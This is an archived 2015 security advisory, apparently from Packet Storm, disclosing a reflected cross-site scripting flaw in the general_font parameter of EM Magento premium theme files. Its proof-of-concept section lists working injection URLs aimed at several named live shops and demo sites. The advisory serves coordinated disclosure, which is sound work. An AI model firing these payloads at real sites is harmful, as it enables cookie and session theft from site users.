exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

eBay Magento Cross Site Scripting

eBay Magento Cross Site Scripting
Posted Jun 19, 2015
Authored by Hadji Samir, Vulnerability Laboratory | Site vulnerability-lab.com

A client-side cross site scripting web vulnerability has been discovered in the official Magento Commerce Premium Theme front-end web-application. The non-persistent xss vulnerability allows remote attackers to inject own script code to the application-side of the vulnerable online-service module.

tags | exploit, remote, web, xss
SHA-256 | 93f9dd7fd63830ad50de3dc317332c7a3e7b19e91c8f617f35ef178a5970df46

eBay Magento Cross Site Scripting

Change Mirror Download
Document Title:
===============
Ebay Magento Bug Bounty #17 - Client Side Cross Site Scripting Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1473

EIBBP-31541


Release Date:
=============
2015-06-15


Vulnerability Laboratory ID (VL-ID):
====================================
1473


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting
this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a client-side cross site request forgery web vulnerability in the official Magento Commerce online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-02-20: Researcher Notification & Coordination (Hadji Samir)
2015-02-21: Vendor Notification (Magento Team - Bug Bounty Program)
2015-03-10: Vendor Response/Feedback (Magento Security Team - Bug Bounty Program)
2015-05-12: Vendor Fix/Patch (Magento Developer Team)
2015-06-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ebay Inc.
Product: Magento - Premium Themes 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Magento Commerce Premium Theme front-end web-application.
The non-persistent xss vulnerability allows remote attackers to inject own script code to the application-side of the vulnerable online-service module.

The vulnerability is located in the `general_front` values of the `/css/theme.less.php` front-end template file. Remote attackers are able to inject own
script codes to client-side application requests. The attack vector is non persistent and the request method to inject/execute is GET. The vulnerable
source is located in the magento premium theme and the stable release.

The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the cross site scripting web vulnerability requires no privileged web application user account and no user interaction.
Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and
non-persistent manipulation of affected or connected service modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] css/less

Vulnerable File(s):
[+] theme.less.php

Vulnerable Parameter(s):
[+] general_front


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction(click).
For security demonstration or to reproduce the security vulnerability follow the provided infomation and steps below to continue.

Vulnerable Source(s):
http://www.gutzzi.com/skin/frontend/default/em0121/css/less/theme.less.php?%40variables_url=%22http%3A%2F%2Fwww.gutzzi.com%2Fskin%2Ffrontend%2Fdefault%2Fem0121%2Fcss%2Fless%2Ftheme.less%22&%40function_url=%22http%3A%2F%2Fwww.gutzzi.com%2Fskin%2Ffrontend%2Fdefault%2Fem0121%2Fcss%2Fless%2Ffunctions.less%22&%40screen-large-desktop=1200px&%40screen-desktop=992px&%40screen-tablet=768px&%40desktop=%7E%22%28max-width%3A+767px%29%22&%40tablet=%7E%22only+screen+and+%28min-width%3A+720px%29+and+%28max-width%3A+959px%29%22&%40page_bg_color=%23ffffff&%40page_bg_position=%7E%220+0%22&%40page_bg_repeat=repeat&%40box_shadow=%7E%220+0+5px+0+%23c4c4c3%22&%40rounded_corner=0&%40general_font=%7E%22normal+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h1_font=%7E%22normal+22px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h2_font=%7E%22normal+20px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h3_font=%7E%22normal+18px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h4_font=%7E%22normal+16px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h5_font=%7E%22normal+14px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40h6_font=%7E%22normal+12px%2F1.35+Raleway%2Chelvetica%2Carial%2Csans-serif%22&%40header_bg_color=%23ffffff&%40header_bg2_color=%23a4d0d9&%40header_bg3_color=%23ffffff&%40header_bg4_color=%23eff7f8&%40header_bg5_color=%23a4d0d9&%40header_bg_position=%7E%220+0%22&%40header_bg_repeat=repeat&%40header_text_color=%23999999&%40header_text2_color=%23686868&%40header_text4_color=%23ffffff&%40header_text5_color=%23000000&%40header_line_color=%23eaeaea&%40topmenu_text_color=%23999999&%40topmenu_hover_text_color=%23686868&%40topmenu_line_color=%23a4d0d9&%40topmenu_font=%7E%22500+15px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40dropmenu_bg_color=%23ffffff&%40dropmenu_text_color=%23666666&%40dropmenu_text2_color=%23a4d0d9&%40dropmenu_line_color=%23d3d3d3&%40dropmenu_font=%7E%22normal+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40body_bg_color=%23ffffff&%40body_bg2_color=%23ffffff&%40body_bg3_color=%23ffffff&%40body_bg4_color=%23abd4dc&%40body_bg6_color=%23f6f6f6&%40body_bg_position=%7E%220+0%22&%40body_bg_repeat=repeat&%40body_text_color=%23ffffff&%40body_text2_color=%23666666&%40body_text3_color=%23686868&%40body_text4_color=%23999999&%40body_text5_color=%23abd4dc&%40body_text6_color=%23ff8401&%40body_line_color=%23d1d1d1&%40body_line2_color=%23eaeaea&%40body_line3_color=%23abd4dc&%40title_font=%7E%22500+15px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40footer_bg_color=%23ffffff&%40footer_bg2_color=%23a4d0d9&%40footer_bg3_color=%23999999&%40footer_bg4_color=%23f2f2f2&%40footer_bg_position=%7E%220+0%22&%40footer_bg_repeat=repeat&%40footer_text_color=%23666666&%40footer_text2_color=%23000000&%40footer_text3_color=%23a4d0d9&%40footer_text4_color=%23999999&%40footer_text5_color=%23ffffff&%40footer_line_color=%23d9d9d9&%40btn1_bg_color=%23a4d0d9&%40btn1_text_color=%23ffffff&%40btn1_line_color=%23a4d0d9&%40btn1_font=%7E%22500+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40btn2_bg_color=%23686868&%40btn2_text_color=%23ffffff&%40btn2_line_color=%23686868&%40btn2_font=%7E%22500+13px%2F1.35+Raleway%2CArial%2CHelvetica%2Csans-serif%22&%40image_bg_url=%7E%22http%3A%2F%2Fwww.gutzzi.com%2F%22&%40page_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22&%40header_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22&%40body_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22&%40footer_bg_image=%7E%22skin%2Ffrontend%2Fdefault%2Fem0121%2Fimages%2Fstripes%2Fblank.gif%22"

PoC(s):
http://www.ediwear.com/skin/frontend/default/em0121/css/less/theme.less.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://saadelectronics.com/skin/frontend/default/galatitanshop/css/less/theme.less.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://saadeperfumes.com/skin/frontend/default/galatitanshop/css/less/theme.less.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
www.diamantiegemme.com/skin/frontend/default/em0121/css/less/theme.less.php?general_font=<script>alert(document.cookie)</script>
http://www.gutzzi.com/skin/frontend/default/em0121/css/less/theme.less.php?general_font=%3Cscript%3Ealert%28%27samir%27%29%3C/script%3E
http://www.emthemes.com/premium-magento-themes.html
http://www.emthemes.com/demo/#em0116
http://demo.emthemes.com/ticker/skin/frontend/default/em0116/css/less/theme.less.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://demo.emthemes.com/ticker/skin/frontend/default/em0116/css/less/theme.less.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://demo.emthemes.com/megamart/skin/frontend/default/em0119/css/theme.css.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://demo.emthemes.com/markpro/skin/frontend/default/em0089/css/theme.css.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://www.emthemes.com/premium-magento-themes.html
http://demo.emthemes.com/superstore/skin/frontend/default/em0096/css/theme.css.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://demo.emthemes.com/gala-shopmore/skin/frontend/default/galashopmore/css/theme.css.php?general_font=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


Solution - Fix & Patch:
=======================
Restrict the input of the general_font value by disallowing the usage of special chars.
Encode and parse the vulnerable file parameters to prevent client-side script code injection attacks.


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the frontend is estimated as medium. (CVSS 3.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt


Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close